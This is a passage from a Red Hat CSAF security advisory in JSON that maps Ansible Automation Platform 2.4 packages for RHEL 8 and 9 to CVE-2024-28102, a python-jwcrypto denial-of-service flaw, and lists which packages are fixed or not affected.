"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-28102",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-03-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268758"
}
],
"notes": [
{
"category": "description",
"text": "An uncontrolled resource consumption vulnerability was found in python-jwcrypto. If a malicious JWE token with a high compression ratio is passed to the server, the server will consume a lot of memory and processing time, leading to a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-jwcrypto: malicious JWE token can cause denial of service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The CVE-2024-28102 vulnerability in JWCrypto represents a moderate severity issue due to its potential impact on system availability and resource consumption. While the vulnerability allows for a denial of service (DoS) attack, it requires an attacker to craft a malicious JWE Token with a high compression ratio. This specific condition limits the practical exploitability of the vulnerability to some extent, as it demands a more sophisticated attack approach than common vulnerabilities. Nonetheless, if exploited, the vulnerability can lead to significant memory exhaustion and increased server processing time, impacting the overall performance and availability of the affected system.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch",
